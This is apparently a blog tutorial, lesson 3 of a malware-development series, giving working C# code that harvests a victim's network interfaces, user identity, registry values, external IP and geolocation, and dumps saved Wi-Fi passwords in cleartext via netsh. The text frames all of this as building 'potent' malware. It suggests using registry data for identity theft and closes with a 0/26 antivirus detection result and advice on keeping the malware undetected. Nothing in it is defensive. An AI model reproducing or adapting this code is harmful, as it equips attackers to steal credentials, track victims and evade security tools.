Lesson 3: Collecting Network Information for Malware Development
Follow XIT on medium & UglyCompany on Telegram for more..
Below is the Topics List for Lesson 3:
3. Collecting Network Information:
⇢ Collecting Network and User Profile Information
⇢ Reading System Registry
⇢ Wifi-Network Info
⇢ Internal & External IP Info
⇢ SSID Passwords
⇢ Current Location
As we continue our dive into the world of malware development, in this lesson we’ll explore the basics of network data collection. By collecting information about a user’s network and IP addresses, you can create more powerful and targeted malware tools. We’ll show you how to collect network and user profile information, read system registry information, and saved wifi network information. We will also cover other topics like accessing internal and external IP address, hacking SSID (Wifi) passwords and getting Current Location of the target machine.
Topic 1: Gathering User and Network Profile Data
Accessing network and user profile data is the initial stage in the process of gathering network information. We’ll show you how to obtain this data using C# code and offer advice on how to store and organize the information in your malware tool.
In your ‘Network.cs’ class file create a new functions for each topics that we’ll be covering in this lesson.
A] We will retrieve the network interfaces on the local computer and display their properties such as name, description, status, and MAC address as shown below:
Name: The name of the network interface.
Description: The description of the network interface.
Status: The operational status of the network interface.
MAC Address: The physical MAC address of the network interface.
// network interfaces info
NetworkInterface[] adapters = NetworkInterface.GetAllNetworkInterfaces();
Console.WriteLine("Network Interfaces:");
foreach (NetworkInterface adapter in adapters)
{
Console.WriteLine($" Name: {adapter.Name}");
Console.WriteLine($" Description: {adapter.Description}");
Console.WriteLine($" Status: {adapter.OperationalStatus}");
Console.WriteLine($" MAC Address: {adapter.GetPhysicalAddress()}");
Console.WriteLine();
}B] We will retrieve information about the current Windows user profile and display its properties such as name, authentication type, and whether the user is authenticated, a guest, or a system user as shown below:
Name: The name of the user profile.
Authentication Type: The type of authentication used to authenticate the user.
Is Authenticated: Whether the user is currently authenticated or not.
Is Guest: Whether the user is a guest user or not.
Is System: Whether the user is a system user or not.
// user profile info
WindowsIdentity identity = WindowsIdentity.GetCurrent();
Console.WriteLine("User Profile Information:");
Console.WriteLine($" Name: {identity.Name}");
Console.WriteLine($" Authentication Type: {identity.AuthenticationType}");
Console.WriteLine($" Is Authenticated: {identity.IsAuthenticated}");
Console.WriteLine($" Is Guest: {identity.IsGuest}");
Console.WriteLine($" Is System: {identity.IsSystem}");
Console.WriteLine();Once you create a function using the above code; call it in ‘Program.cs’ main file and run your application for test. It should get you the output as shown below:
Network Interfaces:
Name: Ethernet
Description: Realtek PCIe GBE Family Controller
Status: Up
MAC Address: 00-11-22-33-44-55
Name: Wi-Fi
Description: Intel(R) Dual Band Wireless-AC 7260
Status: Up
MAC Address: 66-77-88-99-AA-BB
Name: Bluetooth Network Connection
Description: Bluetooth Device (Personal Area Network)
Status: Down
MAC Address: AA-BB-CC-DD-EE-FF
User Profile Information:
Name: DOMAIN\Username
Authentication Type: NTLM
Is Authenticated: True
Is Guest: False
Is System: False
Topic 2: Reading System Registry
System registry data contains valuable information about the user’s network and system configuration. We’ll show you how to read and access this information using C# code.
A] Opening the registry key for the current user and then navigating to the “Software\Microsoft\Windows\CurrentVersion\Run” key, and reading the value of the “SomeExampleApp” registry value is our main goal for this topic. Also we should output the value of this registry key to the console as shown below:
Remember that the “SomeExampleApp” can be your any App which you like to get the values of.
// read registry key
RegistryKey key = Registry.CurrentUser;
key = key.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run");
string value = (string)key.GetValue("SomeExampleApp");
Console.WriteLine($"SomeExampleApp registry value: {value}");You can retrieve following info. reading System Registry:
- Usernames and passwords: As some applications store the login credentials in registry.
- System configuration: The registry contains information about the system configuration, including installed software, hardware components, and network settings like we discussed earlier in lesson 2 of hardware.
- User activity: Some applications log user activity in the registry, including browsing history, file access, and application usage. We could use this information to gather intelligence or commit identity theft.
- Encryption keys: Some encryption applications store encryption keys in the registry. With access to these keys could potentially help us to decrypt sensitive data.
Once you create a function using the above code; call it in ‘Program.cs’ main file and run your application for test. It should get you the output as shown below:
Google Chrome registry value: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window
Topic 3: Wifi-Network Info
Capturing wifi-network information is a powerful feature of any malware tool. We already covered the Network Interface Info grabbing which also includes the Wifi-Network information.
Topic 4: Internal & External IP Info
Knowing the user’s internal and external IP addresses can help you create more targeted and effective malware tools. We’ll demonstrate how to access this information and provide tips for using this data in our malware.
A] We will retrieve the internal IP address of the local computer using the Dns class in C#. Specifically, we should get all the IP addresses associated with the local computer's host name, and then filter out the list that we got as result to find the first IPv4 address (it’s just an address in the InterNetwork family). If a matching IP address is found, it is printed to the console as shown below:
// internal IP address
string internalIp = Dns.GetHostAddresses(Dns.GetHostName())
.FirstOrDefault(ip => ip.AddressFamily == AddressFamily.InterNetwork)
?.ToString();
Console.WriteLine($"Internal IP Address: {internalIp}");B] We will retrieve the external IP address of the local computer by making an HTTP request to external api which displays the public IP in one shot, here I’ll be using https://ifconfig.me/ip but you can use any (I’ll list some below) We then parse the resulting response to extract the IP address. Specifically, we should use the WebClient class to make the request and the Regex class to search the response for a sequence of digits separated by periods (.) that represent an IP address format.
In case if the api used in the code below won’t works in future or gets any error then you might use the alternate apis to get public IP as listed below:
// external IP address
WebClient client = new WebClient();
string externalIpRaw = client.DownloadString("https://ifconfig.me/ip");
string externalIp = Regex.Match(externalIpRaw, @"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}").Value;
Console.WriteLine($"External IP Address: {externalIp}");Once you create a function using the above code; call it in ‘Program.cs’ main file and run your application for test. It should get you the output as shown below:
Internal IP Address: 192.168.1.100
External IP Address: 69.0.111.5
Topic 5: SSID Passwords
Capturing SSID passwords is another powerful feature of any malware tool. We’ll show you how to access this information and log it on the console.
A] We will retrieve the saved Wi-Fi profiles and their corresponding passwords using regular expressions and display them in the console. We will use the regular expression pattern @"All User Profile\s+:\s(.*)\r?\n.*Key Content\s+:\s(.*)\r?" which matches the profile name and password of each saved Wi-Fi network. Then we will use foreach loop to iterates through each match and print the profile name and password to the console as shown below:
// wifipass
Process process = new Process();
process.StartInfo.FileName = "netsh";
process.StartInfo.Arguments = "wlan show profile key=clear";
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.Start();
string output = process.StandardOutput.ReadToEnd();
process.WaitForExit();
MatchCollection matches = Regex.Matches(output, @"All User Profile\s+:\s(.*)\r?\n.*Key Content\s+:\s(.*)\r?", RegexOptions.Singleline);
foreach (Match match in matches)
{
string ssid = match.Groups[1].Value;
string password = match.Groups[2].Value;
Console.WriteLine($"SSID: {ssid}, Password: {password}");
}Once you create a function using the above code; call it in ‘Program.cs’ main file and run your application for test. It should get you the output as shown below:
SSID: HomeNetwork, Password: mypassword1
SSID: WorkNetwork, Password: mypassword2
Topic 6: Current Location
In Topic 4 of this network lesson we covered how we can get External IP address of the target machine. Now, using that External IP address we will get more information about the users current location. We’ll show you how to access this information and log it on the console.
A] We will perform an HTTP GET request to the Geoplugin API with a specified External IP address which we retrieved in Topic 4. Then the response we will parse as XML using the XDocument class. Then we extract some location data from the XML response using LINQ to XML syntax and can store the values in respective variables like city, region and country etc. Finally, we write the extracted location data to the console output using Console.WriteLine method as shown below:
// current location
var httpClient = new HttpClient();
var ip = "THE.EXTERNAL.IP.WHICH.WE.RETRIEVED.FROM.TO";
var url = $"http://www.geoplugin.net/xml.gp?ip={ip}";
var response = httpClient.GetAsync(url).Result;
var xml = response.Content.ReadAsStringAsync().Result;
var doc = XDocument.Parse(xml);
var City = doc.Root.Element("geoplugin_city").Value;
var Region = doc.Root.Element("geoplugin_region").Value;
var Country = doc.Root.Element("geoplugin_countryName").Value;
var Latitude = double.Parse(doc.Root.Element("geoplugin_latitude").Value);
var Longitude = double.Parse(doc.Root.Element("geoplugin_longitude").Value);
Console.WriteLine(City);
Console.WriteLine(Region);
Console.WriteLine(Country);
Console.WriteLine(Latitude);
Console.WriteLine(Longitude);Once you create a function using the above code; call it in ‘Program.cs’ main file and run your application for test. It should get you the output as shown below:
Mountain View
California
United States
37.386
-122.0838
Finally, I compiled all the topics of lesson 3 & it was detected by 0 out of 26 antivirus scans. Below is the antivirus scan report from antiscan.me :
Remember: Don’t share your unencrypted assemblies or malware source to random antivirus scanners, use the only those which are listed on the article given below to keep your malware undetected forever:
Conclusion
Collecting network information is a crucial aspect of creating effective malware tools. In this lesson, we covered the basics of collecting network and user profile information, reading system registry data, gathering wifi-network information, and accessing internal and external IP addresses. We also covered how to capture SSID passwords for added security and potency. With this knowledge, you’re well on your way to creating more potent and effective malware tools. Stay tuned for our next lesson, where we’ll explore the working with Filtration!
